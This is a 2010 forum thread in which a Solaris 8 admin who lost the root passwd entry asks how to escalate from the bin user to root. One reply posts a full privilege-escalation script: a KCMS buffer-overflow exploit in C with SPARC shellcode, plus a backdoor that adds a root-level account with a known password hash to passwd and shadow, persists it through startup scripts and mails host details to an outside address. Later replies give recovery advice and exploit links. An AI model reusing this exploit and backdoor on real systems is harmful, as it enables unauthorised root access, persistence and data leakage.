The Ethical Hacker Network - Solaris 8

dazdaz

Newbie

Offline

Posts: 9

Solaris 8 - from bin to root

« on: September 04, 2010, 01:04:15 PM »

Hi,

I am not sure where to post this, so I try in the "Other - Hacking discussion", apology's in advance if this is incorrect.

I have quite an interesting UNIX Admin dilemma.

I have a Solaris 8 Production server where the root user entry in the passwd file has become overwrote with some random text, voiding the root user completely. I am trying all methods to obtain uid 0 and changing this back to the correct entry before I try a final and last resort of "boot cdrom -s", which becomes complicated when the server is in a remote unmanaged datacenter.

Through some luck, I can switch to the bin user using what appears to be a misconfigured sudo with the command, "sudo -u bin bash"

How can I then switch from bin to root. What vulnerability's exist which would allow me to do this.

I've been looking over /etc/security/exec_attr to see what commands run priviledged. sudo is suid root and version 1.6.8p7 if i recall correctly.

Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root.

The box also has VxVM 4.x installed.


	Logged

sil

Sr. Member

Offline

Posts: 452

Re: Solaris 8 - from bin to root

« Reply #1 on: September 04, 2010, 01:49:24 PM »

Alright, so depending on your patch levels, you should be able to use something I wrote about 12 years ago called rootkeep.sh (http://packetstormsecurity.org/0006-exploits/rootkeep.sh) Read it, use at your own risk, modify the email address, and so on. Should do the trick (still does on 2.6 - 2.9)

Code:

################################################
#
# !/bin/sh
# Rootkeep version *somefin_r33t_goes_here*
# Gain root via kcms.. Follow instructions and
# script will ensure an instant backdoor every
# reboot. Fscking Solaris start-up scripts suck
# Code for KCMS was chopped up by Shadow Pengiun
# Society
# @rwxr--r-- #unixgods (efnet)
#
################################################

cat > kcms.c << EOF

#define ENV "NETPATH="
#define MAXBUF 3000
#define RETADR 2116
#define RETOFS 0x1300
#define EXPADR 1200
#define FAKEADR1 2092
#define FAKEADR2 2112
#define NOP 0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

main()
{
char buf[MAXBUF];
unsigned int i,ip,sp;

putenv("LANG=");
sp=get_sp();
printf("ESP =0x%x\n",sp);

for (i=0;i<MAXBUF-4;i+=4){
buf[i+3]=NOP&0xff;
buf[i+2]=(NOP>>8)&0xff;
buf[i+1]=(NOP>>16)&0xff;
buf[i ]=(NOP>>24)&0xff;
}

ip=sp;
printf("FAKE=0x%x\n",sp);
buf[FAKEADR1+3]=ip&0xff;
buf[FAKEADR1+2]=(ip>>8)&0xff;
buf[FAKEADR1+1]=(ip>>16)&0xff;
buf[FAKEADR1 ]=(ip>>24)&0xff;
buf[FAKEADR2+3]=ip&0xff;
buf[FAKEADR2+2]=(ip>>8)&0xff;
buf[FAKEADR2+1]=(ip>>16)&0xff;
buf[FAKEADR2 ]=(ip>>24)&0xff;

ip=sp-RETOFS;
printf("EIP =0x%x\n",sp);
buf[RETADR+3]=ip&0xff;
buf[RETADR+2]=(ip>>8)&0xff;
buf[RETADR+1]=(ip>>16)&0xff;
buf[RETADR]=(ip>>24)&0xff;

strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

strncpy(buf,ENV,strlen(ENV));
buf[MAXBUF-1]=0;
putenv(buf);

execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}

EOF

echo "Please wait"
gcc kcms.c -o /usr/dt/examples/dtdnd
chmod +x /usr/dt/examples/dtdnd

# This retains your root shell by piecing
# echo'd predefined user and password into
# separate Solaris start up scripts which
# we all know are a nightmare...

cat > dtwsm << EOF

#!/bin/sh
# rootkeep v.1
# sil@antioffline.com

USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
MAIL="intrusion@engineer.com"
PATH=/usr/dt/examples
FILE1=/etc/rc2.d/K40syslog
FILE2=/usr/platform/sun4u/lib/flash-update.sh
HOST=ifconfig -a
PASS=/etc/passwd
SHAD=/etc/shadow
STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
# string equates to p4$sW3rD
WORD="p4$sW3rD"
if test -n grep dtserver $PASS

then echo $HOST is already backdoored >> /usr/dt/examples/dtinfo;
mail -s dtserver $MAIL < /usr/dt/examples/dtinfo;
else

echo $USER >> $PASS;
echo $STRN >> $SHAD;
mail -s dtserver MAIL < /usr/dt/examples/dtinfo

fi

if test -n grep $STRN $SHAD

then echo Password is set to $WORD | mail -s dtserver $MAIL

else
echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh" >> $FILE1;
echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28:::" >> $FILE2;
mail -s dtsrm -f /usr/dt/example/dtd

fi
EOF

chmod +x dtdnd
mv dtdnd /usr/dt
/usr/dt/examples/./dtdnd

echo "Now type /usr/dt/examples/./dtwsm and your set...."


	Logged

http://www.infiltrated.net/mgz/puppylecter.jpg

dazdaz

Newbie

Offline

Posts: 9

Re: Solaris 8 - from bin to root

« Reply #2 on: September 04, 2010, 02:46:43 PM »

Hi, thanks for the reply, I really appreciate it however there is something that does'nt quite make sense to me. The comments at the top of the script suggest that after you've rebooted the system, then you'll obtain root access.

If I reboot the system then I may as well send a technician to the datacenter to insert a Solaris CD and boot off the cdrom into single user mode using the serial console and mount the root file-system and edit/correct the root entry in the passwd file manually, as both methods will cause system downtime.

As this is a production server there is no compiler installed although I am sure that I can find one somewhere.

The patch levels are not the most current, nor does it make use of the Solaris 8 vintage patching service.

Quote "
# Follow instructions and script will ensure an instant backdoor every reboot.
# Fscking Solaris start-up scripts suck"


« Last Edit: September 04, 2010, 02:50:23 PM by dazdaz »	Logged

sil

Sr. Member

Offline

Posts: 452

Re: Solaris 8 - from bin to root

« Reply #3 on: September 04, 2010, 03:46:50 PM »

Please read through the script and what it sets out to accomplish and what it ends up doing. Step by step:

1) Compile an exploit aimed at KCMS
2) Exploit KCMS
3) Acquite a rootshell
ADDONS
4) Add a root level user account using a predefined password
5) Add modifications to start up script to ENSURE a root shell upon a reboot

If you go through steps 1, 2 and 3, you'd get root, what you choose to do from there is up to you.


	Logged

http://www.infiltrated.net/mgz/puppylecter.jpg

dazdaz

Newbie

Offline

Posts: 9

Re: Solaris 8 - from bin to root

« Reply #4 on: September 04, 2010, 04:03:21 PM »

Sorry, i should of spent longer reading through the script.

There is'nt a directory named /usr/openwin/bin (no openwindows, removed for increased security) and thus no kcms to exploit on the box.


	Logged

sil

Sr. Member

Offline

Posts: 452

Re: Solaris 8 - from bin to root

« Reply #5 on: September 04, 2010, 05:08:15 PM »

The harsh reality is, you're safer having someone go through the motions of a single mode boot to fix the password however, even with a single boot, I don't believe they'd be able to get far under certain conditions... Is PROM protected? If so, I *do* hope that password is remembered.

Now, you stated that the password entry for root is borked, and while this is fixable, a lost PROM password is a whole "nother" ballgame. So do you know if "security-mode" is set to full on PROM if so, then you'll have to make sure whomever is booting into single mode knows this and knows the password for getting past the PROM.

Again, to be on the safe side, you'd be safer to get someone to go through the motions (boot -s) however, make sure you have all the information down to a science (supplied them with all the credentials, etc.) otherwise the longer that server is down, the more money you potentially lose. If you do want to keep on trying local exploits, you can try the linked local exploits for Solaris. Again, use those and ANY exploit at your own risk.

http://www.exploit-db.com/exploits/1182/
http://www.exploit-db.com/exploits/715/

I had a similar scenario last week with a FreeBSD 8.1 box I deployed to do flow-analysis. I created the machine for a client to run tshark, etc and SCP over the files to me on an hourly basis for analysis. The client supplied the server, I installed and scripted some tools and I created the password based on what the client wanted... Guess what? He lost the password and there was NO ONE around to boot into single mode for me. The machine itself was in another state and NOT a NOC where I would have had someone to do anything for me. Lo-and-behold one of kingcope's local exploits came in handy for me. From $USER to root in less than 10 minutes (about 8 were spent shmoozing via email and searching).

Anyway, my rambling is besides the point I guess... You're better off having someone ON-SITE do any changes to be on the safer side. I'd suggest having them perform these changes as late (non-used hours) as possible and enforce this. I've seen NOC's and their engineers say "sure... at 3AM alright", then turn around 15 minutes later. Your SLA is king Wink

Also, if possible you'd want to know WHO would be making the changes (booting into single) beforehand so you can walk through the motions with them either via email or on the phone. This ensures (as best as possible) that someone with a clue is going to make the change.


	Logged

http://www.infiltrated.net/mgz/puppylecter.jpg

dazdaz

Newbie

Offline

Posts: 9

Re: Solaris 8 - from bin to root

« Reply #6 on: September 05, 2010, 02:48:57 AM »

Great, the ldpreload exploit should work from checking the patch revisions on the box.

Believe it or not, there is no PROM security.

We believe it was one of 2 developers who overwrote the passwd file although why they were editing it in the first place we dont know.

This type of scenario would make a great UNIX admin interview question, although I hope that I never see this type of problem ever again :-)

I hav'nt used FreeBSD for ages, but a great platform !


	Logged

dynamik

Recruiters
Sr. Member

Offline

Posts: 465

Danger Zone

Re: Solaris 8 - from bin to root

« Reply #7 on: September 05, 2010, 08:59:46 AM »

I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?


	Logged

WIP: OSWP && OSCP

The day you stop learning is the day you start becoming obsolete.

sil

Sr. Member

Offline

Posts: 452

Re: Solaris 8 - from bin to root

« Reply #8 on: September 05, 2010, 10:21:31 AM »

Quote from: dynamik on September 05, 2010, 08:59:46 AM

I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?

Take note: Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root. He didn't have access to an account that had enough privileges.

Solaris from an admin level is no different from Linux. The command syntax is a lot different but at the end of the day, the core is the same. If he had access to an account to write to it, he would have been able to make the change.

A long time ago I ran into a similar problem under Solaris however, root as a user was completely gone and I literally had to retype the account in vi via single mode. I've also run into this situation on zones on Solaris. Because a root user in one zone can't do what a root user in that container can, I had to root as root a container Wink

Solaris is a funny OS, end of the day though, no different from Linux. He just didn't have privileges. On the flip side, if he was using containers/zones, he'd of been hit since getting root on one container does nothing for another zone. (Who's on first? No who's on second...)


	Logged

http://www.infiltrated.net/mgz/puppylecter.jpg

dynamik

Recruiters
Sr. Member

Offline

Posts: 465

Danger Zone

Re: Solaris 8 - from bin to root

« Reply #9 on: September 05, 2010, 12:26:53 PM »

Ah, so they simply don't have access anymore. Thanks.


	Logged

WIP: OSWP && OSCP

The day you stop learning is the day you start becoming obsolete.

Pages: [1] Go Up

« previous next »